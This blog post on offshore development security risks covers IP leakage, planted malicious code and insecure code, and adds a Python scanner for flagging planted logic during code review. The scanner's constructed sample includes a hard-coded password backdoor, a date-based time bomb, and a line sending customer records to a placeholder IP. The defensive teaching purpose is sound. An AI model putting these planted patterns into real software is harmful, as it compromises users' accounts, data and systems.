I have been looking at a number of security issues related to offshore development as of late. Basically, they tend to fall into a few broad categories:
- Intellectual Property drain – I have heard it said: “If you want to keep a secret – don’t tell nobody.” Well, sending specs for business-critical software overseas to be implemented in a foreign country with a radically different legal system and cultural appreciation for intellectual property probably qualifies as “telling somebody.” This was less of an issue when the work going overseas was Y2K COBOL maintenance, but these days genuinely innovative work is being implemented all around the world, and the risk is far greater. Google can give you some recommendations about best practices for offshore development, but at the end of the day moving development offshore drastically increases the risk that the confidentiality of your information will be compromised.
- Malicious code – This is the threat that offshore developers intentionally insert malicious code into the software that is delivered. Malicious code could be anything from time bombs set to go off if future contract negotiations do not go well, to code that siphons off customer data, to system-level backdoors. Slashdot had an article today about the US government investigating Lenovo. This wasn’t specifically offshore software-related, but it does speak to concerns about having information technology goods produced offshore. The “good” news here is that organizations at least have a chance to review the code before it goes into production (hopefully). The “bad” news is that reviewing code to find these sorts of defects is extremely time consuming and requires well trained individuals. This isn’t a matter of finding technical flaws such as SQL injection or Cross-Site Scripting, which automated code scanners can find. Planted logic looks like ordinary business code: finding it requires a line-by-line search of the application for logic that results in a compromise, and the review has to cover everything that actually ships, including build scripts and bundled third-party components, not just the hand-written source. Malicious code in offshore-developed software is especially scary because it brings into question the confidentiality, integrity and availability of any systems brought online based on the code.
- Insecure code – If US developers can make mistakes, so can offshore developers. US-based software development organizations are bad enough at designing and implementing reasonably secure applications. If offshore organizations are soliciting customers primarily on price, security will be the first concern to go out the window. In my experience, I have seen this become an issue time and time again when organizations with little in-house technical expertise try to develop software offshore. They simply don’t know what to ask for. Even organizations that are technically sophisticated often do not make this a priority. If you ask for security you might not get it – if you don’t ask for security you certainly won’t get it.
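The line-by-line review called for under the malicious code item above can at least be given a starting point by cheap heuristics that flag the constructs planted logic tends to need: a comparison against a hard-coded date (time bomb), a credential compared with a string literal (backdoor), and an embedded host or URL (exfiltration). What follows is an added example, not code from the original post or from Denim Group. It is a small Python AST scanner run over a constructed sample "deliverable" that contains all three; the sample module, the function name find_suspicious and the name patterns it uses are assumptions made for this example.

```python
"""Triage aid for reviewing delivered source for planted logic (added example).

The scanner does not find malicious logic by itself; it points a human
reviewer at the lines most worth reading first.
"""
import ast
import re

# Constructed sample of a delivered module with planted logic (not real code).
SAMPLE_DELIVERABLE = '''
import datetime
import urllib.request

def apply_discount(order):
    """Ordinary business logic."""
    if order["total"] > 100:
        return order["total"] * 0.9
    return order["total"]

def authenticate(username, password, user_db):
    # planted backdoor: a fixed password works for any account
    if password == "m41nt-2007":
        return True
    return user_db.get(username) == password

def nightly_job(customers):
    # planted time bomb dressed up as a "license check"
    if datetime.date.today() > datetime.date(2008, 6, 30):
        raise RuntimeError("license expired")
    # planted exfiltration of customer records
    data = repr(customers).encode()
    urllib.request.urlopen("http://203.0.113.10/sync", data=data)
    return len(customers)
'''

# Deliberately noisy: a triage heuristic should over-flag, not under-flag.
CREDENTIAL_NAMES = re.compile(r"pass(word|wd)?|secret|token|api_?key", re.I)
HOST_PATTERN = re.compile(r"https?://|\b\d{1,3}(\.\d{1,3}){3}\b")
DATE_CALLS = {"date", "datetime", "today", "now", "utcnow", "mktime", "time"}


def _call_name(node):
    """Trailing attribute or name of a call target, e.g. 'today' for datetime.date.today()."""
    func = node.func
    if isinstance(func, ast.Attribute):
        return func.attr
    if isinstance(func, ast.Name):
        return func.id
    return ""


def _names_in(node):
    """Identifier and attribute names appearing anywhere under node."""
    out = set()
    for sub in ast.walk(node):
        if isinstance(sub, ast.Name):
            out.add(sub.id)
        elif isinstance(sub, ast.Attribute):
            out.add(sub.attr)
    return out


def find_suspicious(source):
    """Return sorted (line, reason) pairs for constructs worth manual review."""
    findings = []
    tree = ast.parse(source)
    for node in ast.walk(tree):
        if isinstance(node, ast.Compare):
            operands = [node.left] + node.comparators
            # A comparison against a clock or a literal date is the classic time-bomb trigger.
            calls = [o for o in operands if isinstance(o, ast.Call)]
            if any(_call_name(c) in DATE_CALLS for c in calls):
                findings.append((node.lineno, "comparison against hard-coded date/time"))
            # A credential-looking name compared with a string literal is a backdoor smell.
            has_literal = any(isinstance(o, ast.Constant) and isinstance(o.value, str)
                              for o in operands)
            if has_literal and any(CREDENTIAL_NAMES.search(n) for n in _names_in(node)):
                findings.append((node.lineno, "credential compared with string literal"))
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            # Embedded hosts or URLs in business logic deserve a look: where does data go?
            if HOST_PATTERN.search(node.value):
                findings.append((node.lineno, "embedded host or URL"))
    return sorted(set(findings))


if __name__ == "__main__":
    for line, reason in find_suspicious(SAMPLE_DELIVERABLE):
        print(f"line {line}: {reason}")
```

The scanner flags the backdoor, the time bomb and the exfiltration call in the sample, and nothing in the legitimate discount function. It is a ranking aid for the reviewer, not a replacement for the review: a time bomb keyed to a request counter or a configuration value rather than a date, or a credential assembled at runtime, slips straight past it, which is exactly why the post says these defects need a human reading the logic.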
Offshoring software development can significantly reduce the costs of developing applications. However, organizations need to take into account the costs of certifying the deliverables that come back as well as the indirect costs from the security risks associated with offshore development.
dan _at_ denimgroup.com